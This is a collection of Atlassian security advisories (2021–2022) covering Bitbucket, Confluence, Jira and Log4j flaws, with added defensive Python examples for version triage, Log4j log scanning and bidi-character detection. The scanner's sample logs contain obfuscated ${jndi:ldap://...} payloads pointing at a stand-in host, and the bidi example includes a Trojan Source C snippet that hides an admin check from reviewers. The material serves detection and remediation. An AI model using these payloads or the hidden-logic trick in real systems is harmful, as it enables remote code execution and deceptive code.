Atlassian Security Updates (CVE)
August 2022
Critical severity command injection vulnerability, released 24 Aug 2022
Information
This advisory discloses a critical severity security vulnerability that was introduced in version 7.0.0 of Bitbucket Server and Data Center. All versions released after 6.10.17, including 7.0.0 and newer, are affected; in other words, every instance running a version between 7.0.0 and 8.3.0 inclusive is affected by this vulnerability.
There is a command injection vulnerability in multiple API endpoints of Bitbucket Server and Data Center. An attacker with access to a public repository, or with read permission on a private repository, can execute arbitrary code by sending a malicious HTTP request.
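As an added example (not part of the Atlassian advisory), a fleet check that applies the version range stated above to an inventory of Bitbucket instances. Hostnames and version strings are constructed for the example. The point a practitioner usually gets wrong is comparing version strings lexically: as strings, "8.10.0" sorts before "8.3.0", so a naive comparison would misclassify it.

```python
def parse_version(v):
    """'8.3.0' -> (8, 3, 0). Numeric tuples compare correctly where strings do not
    (as strings, '8.10.0' < '8.3.0', which would wrongly flag 8.10.0 as affected)."""
    return tuple(int(part) for part in v.strip().split("."))

# Boundaries taken from the advisory text above.
FIRST_AFFECTED = parse_version("7.0.0")
LAST_AFFECTED = parse_version("8.3.0")
LAST_UNAFFECTED_6X = parse_version("6.10.17")

def is_affected(version):
    """True if a Bitbucket Server/DC version string falls in the affected range."""
    v = parse_version(version)
    if FIRST_AFFECTED <= v <= LAST_AFFECTED:
        return True
    # "All versions released after 6.10.17" also covers any 6.10.x build newer than 6.10.17.
    return LAST_UNAFFECTED_6X < v < FIRST_AFFECTED

# Constructed inventory for the example; hostnames and versions are made up.
INVENTORY = {
    "bitbucket-prod.example.internal": "7.21.0",
    "bitbucket-legacy.example.internal": "6.10.17",
    "bitbucket-dev.example.internal": "8.3.1",
    "bitbucket-ci.example.internal": "8.10.0",
    "bitbucket-lab.example.internal": "8.3.0",
}

def affected_hosts(inventory):
    """Sorted list of hosts whose reported version is inside the affected range."""
    return sorted(host for host, ver in inventory.items() if is_affected(ver))

if __name__ == "__main__":
    for host in affected_hosts(INVENTORY):
        print(f"{host}: {INVENTORY[host]} is in the affected range, upgrade")
```

Treat this as first-pass triage only. Atlassian published fixed releases on several 7.x and 8.x lines for this advisory (not reproduced on this page), and a patched build on an older line carries a version number inside this range, so confirm each flagged host against the fixed-version list for its release line before deciding it needs an upgrade.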
Affected products
- Bitbucket Server and Data Center
July 2022
Released 20 Jul 2022; fixed versions are available. This vulnerability should be remediated on affected systems immediately.
Information
A Servlet Filter is Java code that intercepts and processes an HTTP request before it reaches a back-end resource. Filters can likewise intercept and process the HTTP response from the back-end resource before it is returned to the client. Some Servlet Filters implement security mechanisms such as logging, auditing, authentication, or authorization.
Affected products
- Bamboo Server and Data Center
- Bitbucket Server and Data Center
- Confluence Server and Data Center
- Crowd Server and Data Center
- Fisheye and Crucible
- Jira Server and Data Center
- Jira Service Management Server and Data Center
Released 20 Jul 2022; fixed versions are available. This vulnerability should be remediated on affected systems immediately.
Information
When the Questions for Confluence app is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username disabledsystemuser. This account is intended to aid administrators that are migrating data from the app to Confluence Cloud. The disabledsystemuser account is created with a hardcoded password and is added to the confluence-users group, which allows viewing and editing all non-restricted pages within Confluence by default. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access any pages the confluence-users group has access to.
Affected products
Questions For Confluence app for:
- Confluence Server
- Confluence Data Center
June 2022
This advisory discloses a high severity security vulnerability, released June 29, 2022; fixed versions are available.
Information
A full-read server-side request forgery (SSRF) exists in the Mobile Plugin for Jira, which is bundled with Jira and Jira Service Management. It is exploitable by any authenticated user (including a user who joined via the sign-up feature). It specifically affects the batch HTTP endpoint used by the Mobile Plugin for Jira: the HTTP method and the destination URL of the request can be controlled through the method parameter in the body of the vulnerable endpoint.
Affected products
- Jira Core Server
- Jira Software Server
- Jira Software Data Center
- Jira Service Management Server
- Jira Service Management Data Center
A new ‘Critical’ vulnerability was released June 2, 2022; fixed versions are available.
Information
Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
Affected products
All versions of Confluence Server and Data Center prior to the fixed versions listed in the advisory are affected by this vulnerability.
December 2021
Log4j remote code execution vulnerability (CVE-2021-44228), disclosed December 2021.
Information
Multiple Atlassian products use the third-party Log4j library, which is vulnerable to CVE-2021-44228:
Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
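As an added example (not part of the Atlassian advisory), detection logic for the lookup-substitution behaviour described above, run over constructed web-server access log lines. Because Log4j evaluates nested lookups such as ${lower:J} and the default-value form ${::-j} before it sees the jndi: prefix, a grep for the literal string ${jndi: misses obfuscated payloads; the scanner below peels percent-encoding and resolves innermost lookups the same way, then checks whether a jndi lookup emerges. The log lines, addresses and the _resolve helper's treatment of unresolvable lookups are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body that contains no nested "${" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_MAX_STEPS = 64  # bound the rewrite loop on pathological lines


def _resolve(body):
    """Text an innermost Log4j lookup evaluates to, for the lookups used as obfuscation."""
    # ${x:-default}: the default wins when x is empty or unresolvable,
    # e.g. ${::-j} -> "j" and ${env:NOPE:-j} -> "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if name.lower() == "lower":
        return arg.lower()
    if name.lower() == "upper":
        return arg.upper()
    # Other lookups (env, sys, date, ...) need the target host to evaluate (assumption:
    # keep their argument text so the loop still terminates and embedded text stays visible).
    return arg if sep else ""


def normalize(line):
    """Undo up to two layers of percent-encoding, as found in logged request lines."""
    for _ in range(2):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def find_jndi(line):
    """Return the de-obfuscated ${jndi:...} lookup in a log line, or None if there is none."""
    text = normalize(line)
    for _ in range(_MAX_STEPS):
        m = _INNERMOST.search(text)
        if m is None:
            return None
        body = m.group(1)
        # Log4j resolves lookup prefixes case-insensitively, so compare lowercased.
        if body.split(":", 1)[0].strip().lower() == "jndi":
            return "${" + body + "}"
        text = text[:m.start()] + _resolve(body) + text[m.end():]
    return None


# Constructed sample log lines (not real traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:13:01:05 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.9/b}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:09 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.10 - - [10/Dec/2021:13:01:12 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '10.0.0.11 - - [10/Dec/2021:13:01:15 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "kube-probe/1.21"',
]


def scan(lines):
    """Return (line_number, decoded lookup) for each line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, found))
    return hits


if __name__ == "__main__":
    for n, lookup in scan(SAMPLE_LOG):
        print(f"line {n}: {lookup}")
```

The fourth sample line contains a harmless ${date:...} lookup and is not reported, which is the reason to resolve lookups rather than alert on every "${". A hit on an access log only shows that a payload arrived; whether it executed depends on the Log4j version and configuration on the receiving host, so pair this with the version check for the products listed below.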
Affected products
Bitbucket
November 2021
A new ‘High’ vulnerability was disclosed November 1, 2021.
Severity
Atlassian rates the severity level of this vulnerability as high, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.
This is our assessment and you should evaluate its applicability to your own IT environment.
Affected products
- Bamboo Server and Data Center
- Bitbucket Server and Data Center
- Confluence Server and Data Center
- Crucible
- Fisheye
- Jira Service Management Server and Data Center (and Insight Asset Management app)
- Jira Software Server and Data Center (including Jira Core)
- Jira and Confluence Server mobile apps
Description
A vulnerability has been identified affecting multiple Atlassian products where special characters, known as Unicode bidirectional override characters, are not rendered or displayed in the affected applications. These characters are typically invisible in browsers and code editors, but they change the order in which the surrounding text is displayed, so source code can read one way to a human reviewer and another way to the compiler or interpreter that processes it.
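As an added example (not part of the Atlassian advisory), a scanner that reports the bidirectional control characters described above and renders them visibly, the check a code-review tool or pre-receive hook can run. It classifies characters by their Unicode Bidi_Class via the standard library rather than a hand-written table. The C snippet it scans is a constructed sample modelled on the published "early return" trick, not code from any affected product.

```python
import unicodedata

# Bidi classes of the override, embedding and isolate controls
# (U+202A..U+202E and U+2066..U+2069), which reorder displayed text.
BIDI_CONTROL_CLASSES = {"LRE", "RLE", "PDF", "LRO", "RLO", "LRI", "RLI", "FSI", "PDI"}


def is_bidi_control(ch):
    return unicodedata.bidirectional(ch) in BIDI_CONTROL_CLASSES


def find_bidi_controls(text):
    """Return (line, column, code point, bidi class) for every bidi control in text."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            if is_bidi_control(ch):
                hits.append((line_no, col, f"U+{ord(ch):04X}", unicodedata.bidirectional(ch)))
    return hits


def render_visible(line):
    """Replace each invisible control with a visible <CLASS> marker so a reviewer sees
    the token order the compiler sees, not the order the editor paints on screen."""
    return "".join(f"<{unicodedata.bidirectional(c)}>" if is_bidi_control(c) else c for c in line)


# Constructed sample. Line 4 carries RLO/LRI/PDI controls inside a comment: an editor
# paints it as if the comment ended early and was followed by "if (isAdmin) {", while the
# compiler sees one comment running to "*/", so the printf below it is unconditional.
SAMPLE_SOURCE = (
    "#include <stdio.h>\n"
    "int main() {\n"
    "    bool isAdmin = false;\n"
    "    /*\u202E } \u2066 if (isAdmin) \u2069 \u2066 begin admins only */\n"
    "        printf(\"You are an admin.\\n\");\n"
    "    /* end admins only \u202E { \u2066 */\n"
    "    return 0;\n"
    "}\n"
)


if __name__ == "__main__":
    lines = SAMPLE_SOURCE.splitlines()
    for line_no, col, cp, cls in find_bidi_controls(SAMPLE_SOURCE):
        print(f"line {line_no} col {col}: {cp} ({cls})")
        print("   ", render_visible(lines[line_no - 1]))
```

Run find_bidi_controls over every file in a push (or over the rendered diff, comments included) and reject the change when the result is non-empty; legitimate use of these controls in source code is rare enough that an allow-list per file is a reasonable exception mechanism.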
Acknowledgements
The issue was identified and reported by Nicholas Boucher and Ross Anderson of the University of Cambridge.
October 2021
A new ‘Critical’ vulnerability was disclosed 20 Oct 2021.
Severity
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate, or low.
This is our assessment and you should evaluate its applicability to your own IT environment.
Affected products
- Insight – Asset Management app
- Jira Service Management Data Center and Server
Description
Insight – Asset Management has a feature to import data from several databases (DBs). One of these DBs, the H2 DB, has a native function in its library which an attacker can use to run code on the server (remote code execution a.k.a. RCE). The H2 DB is bundled with Jira to help speed up the setup of Jira test environments.
The combination of the DB import feature introduced by Insight – Asset Management with the H2 DB library already present in Jira exposed this vulnerability. The vulnerability exists whether or not the import configuration was saved, and even if H2 was never used as a target DB. Exploiting this vulnerability requires the following:
The user must be an authenticated Jira user AND
Either of the following privileges within Insight – Asset Management:
- user or group permission to “Insight administrator”
- user or group permission to “Object Schema Manager”
August 2021
A new ‘Critical’ vulnerability was disclosed 25 August 2021.
Severity
This vulnerability is being actively exploited in the wild.
Affected servers should be patched immediately.
Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.
This is our assessment and you should evaluate its applicability to your own IT environment.
Affected products
- Confluence Server
- Confluence Data Center
Description
An OGNL injection vulnerability exists that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
All versions of Confluence Server and Data Center prior to the fixed versions listed in the advisory are affected by this vulnerability.
Acknowledgements
The issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.